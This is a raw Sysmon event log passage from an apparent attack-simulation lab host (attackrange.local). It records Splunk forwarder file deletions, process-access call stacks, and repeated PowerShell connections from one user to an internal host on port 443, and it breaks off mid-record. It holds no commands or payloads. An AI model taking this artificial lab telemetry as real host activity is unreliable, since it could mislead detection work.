23542300x800000000000000035083631Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:06:19.445{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B20FA376BD61D5497A91F4BA88EC77EA,SHA256=B7B198F5344314207C4DF511716AA4E58706076FDDCA8C1842D60027FE29F6B9,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035083662Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:06:20.643{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D74FF2F95DC6F4687A632B62CF77B796,SHA256=24551560873E427A1625AF415C2717C79B9D34F604ED19D13953E306B9026C96,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035083665Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:06:21.663{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=AE2134513216EE55949F9172EDDB55CD,SHA256=36A2B598D96EB95D6C417F8DED0599E42566F750CA9BE267791926F80F525EDD,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000035083664Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:06:46.238{B81B27B7-4822-613A-788F-03000000C801}6940C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeATTACKRANGE\REED_SCHMIDTtcptruefalse10.0.1.15win-host-987.attackrange.local56501-false10.0.1.16ip-10-0-1-16.us-west-2.compute.internal443https 23542300x800000000000000035083663Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:06:21.463{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=4A85D91C032D45B7D5D04C996524F4E3,SHA256=6D1480363A01D3B9F64B17298B2BCCB8754AF23D5A22B2383915F13169C66FEB,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035083666Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:06:22.677{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=61AFBB3A445147D6855E2C197EF2C6BA,SHA256=CDD27CB43EE3F6B683D5049A0064FB78BFC9E7E0C096E2FBE55E268F111288DE,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035083667Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:06:23.692{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=FB967F98E866541308B8D049E6875E52,SHA256=8804C20C6F671AB5E4CCF2E745C751D23B444633F2EE5E0588A36BA7212502CC,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035083668Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:06:24.707{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=9B5C18D68E9928EF3D6A0A8357361EAB,SHA256=DE771C0BCD6E92B1F533BF2998DFE24C456466BCFAAD421CD98D41DFC6954678,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000035083670Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:06:49.073{B81B27B7-401D-611D-6900-00000000C801}3616C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-987.attackrange.local56502-false10.0.1.12-8000- 23542300x800000000000000035083669Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:06:25.744{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=36589D2C7F8EB135A495A9745F6841E2,SHA256=51216659B766B4E1E52F3C640C44EEE04D96CE2AB991BA233B2F56239C692786,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035083671Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:06:26.758{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=61BB0F8FC1E7813C15C9F32853E45BC2,SHA256=706106AB4D304A8D4BF4292A142978729B52FDD4882848991A6782B340BF0E52,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000035083674Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:06:52.249{B81B27B7-4822-613A-788F-03000000C801}6940C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeATTACKRANGE\REED_SCHMIDTtcptruefalse10.0.1.15win-host-987.attackrange.local56503-false10.0.1.16ip-10-0-1-16.us-west-2.compute.internal443https 23542300x800000000000000035083673Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:06:27.773{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=FAFAE1486BA40DF41DAA1683183FA977,SHA256=5A6B6FABCCBEDABF204938FC247FEACF83DC7EC64AB5939FEAF0C14F2CFC065B,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035083672Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:06:27.374{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=E09678D7010DDD2105E3484022AE0F34,SHA256=7AD36BA30C9D9733226DB4FD8805E1818FD554F96FB32018F60C9414BDEA906A,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 10341000x800000000000000035083691Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:06:28.941{B81B27B7-4014-611D-3000-00000000C801}31443164C:\Windows\system32\conhost.exe{B81B27B7-4D24-613A-1C90-03000000C801}728C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035083690Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:06:28.941{B81B27B7-4012-611D-0C00-00000000C801}7325640C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035083689Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:06:28.941{B81B27B7-4012-611D-0C00-00000000C801}7325640C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035083688Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:06:28.941{B81B27B7-4012-611D-0C00-00000000C801}7325640C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035083687Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:06:28.941{B81B27B7-4012-611D-0C00-00000000C801}7325640C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035083686Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:06:28.941{B81B27B7-4012-611D-0500-00000000C801}420436C:\Windows\system32\csrss.exe{B81B27B7-4D24-613A-1C90-03000000C801}728C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000035083685Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:06:28.941{B81B27B7-4013-611D-2700-00000000C801}20763760C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{B81B27B7-4D24-613A-1C90-03000000C801}728C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x800000000000000035083684Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:06:28.937{B81B27B7-4D24-613A-1C90-03000000C801}728C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{B81B27B7-4012-611D-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{B81B27B7-4013-611D-2700-00000000C801}2076C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x800000000000000035083683Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:06:28.803{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B5272FD94ECE67784C7993E5CD59B463,SHA256=F2F7E225ED1C50A57DAAD6BDDD6289F8A71FF84DC3FDB8A60571BC438AD084CC,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 10341000x800000000000000035083682Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:06:28.320{B81B27B7-4014-611D-3000-00000000C801}31443164C:\Windows\system32\conhost.exe{B81B27B7-4D24-613A-1B90-03000000C801}6180C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035083681Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:06:28.320{B81B27B7-4012-611D-0C00-00000000C801}7325640C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035083680Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:06:28.320{B81B27B7-4012-611D-0C00-00000000C801}7325640C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035083679Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:06:28.320{B81B27B7-4012-611D-0C00-00000000C801}7325640C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035083678Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:06:28.320{B81B27B7-4012-611D-0C00-00000000C801}7325640C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035083677Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:06:28.320{B81B27B7-4012-611D-0500-00000000C801}420536C:\Windows\system32\csrss.exe{B81B27B7-4D24-613A-1B90-03000000C801}6180C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000035083676Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:06:28.320{B81B27B7-4013-611D-2700-00000000C801}20763760C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{B81B27B7-4D24-613A-1B90-03000000C801}6180C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x800000000000000035083675Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:06:28.305{B81B27B7-4D24-613A-1B90-03000000C801}6180C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe8.0.2Network monitorSplunk ApplicationSplunk Inc.splunk-netmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{B81B27B7-4012-611D-E703-000000000000}0x3e70SystemMD5=8746B8C1724B67C2B1261446C0CFAA57,SHA256=7EFD09FD383FAA75C5D2990E6DBBFD846AEAA08B7037C7D66B4A0EF2AE0866B3,IMPHASH=7B985F47B35272AD7B5218255ACE7AEC{B81B27B7-4013-611D-2700-00000000C801}2076C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x800000000000000035083695Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:06:29.818{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=7F3B655E0974CA6D4F86FF69E3900D22,SHA256=C5A4FBB3804B9464EB6A91A736D60E5B0207F05247428C76490CE2726EF8713C,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035083694Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:06:29.318{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=B71CF7AC13338D3FA71F18F6A9B67E12,SHA256=23B3688530B31D1CCB6B39F3F435B0697820D676139835DE462798BC039AC20E,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035083693Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:06:29.318{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=8B986B9817F38BAE92E83A227B66494E,SHA256=18E146EE176A7A677F40FA28EE4F4E4C8F0A59169C21D1180A97D9ED39B62037,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 10341000x800000000000000035083692Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:06:29.103{B81B27B7-4D24-613A-1C90-03000000C801}7282900C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{B81B27B7-4013-611D-2700-00000000C801}2076C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 354300x800000000000000035083697Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:06:54.185{B81B27B7-401D-611D-6900-00000000C801}3616C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-987.attackrange.local56504-false10.0.1.12-8000- 23542300x800000000000000035083696Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:06:30.835{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=0E0A298B8F555F1AD99BA68C3F7904B3,SHA256=02EF8A3B227D43F1EA08B0E8031D47ACDD0A8087F0E3068A751C5E6A5D1E1D21,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000035083700Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:06:56.267{B81B27B7-4822-613A-788F-03000000C801}6940C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeATTACKRANGE\REED_SCHMIDTtcptruefalse10.0.1.15win-host-987.attackrange.local56505-false10.0.1.16ip-10-0-1-16.us-west-2.compute.internal443https 23542300x800000000000000035083699Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:06:31.868{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program 